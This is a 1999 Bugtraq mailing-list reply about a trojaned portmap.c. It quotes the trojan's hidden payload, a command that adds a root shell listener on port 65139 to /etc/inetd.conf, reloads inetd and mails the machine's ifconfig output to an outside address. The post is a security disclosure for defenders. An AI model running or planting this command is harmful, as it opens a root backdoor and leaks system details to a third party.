Bugtraq mailing list archives
Re: portmap.c Trojan
From: wakko () WTOWER COM (Wakko Ellington Warner-Warner III)
Date: Sat, 21 Aug 1999 21:20:55 -0400
On Fri, 20 Aug 1999, goatkiller wrote: The actual "shellcode" that gets executed follows: /bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ; /bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail goat187 () hotmail com 2>&1 2>/dev/null - A.P. -- +------------------------------------------+------------------+ | "We are a great software company. That's | NIC: AP5514 16 | | the only image anyone should have of | http://bitey.net | | us." -- Bill Gates | wakko () bitey net | +------------------------------------------+------------------+
Current thread:
- portmap.c Trojan goatkiller (Aug 20)
- Re: portmap.c Trojan Wakko Ellington Warner-Warner III (Aug 21)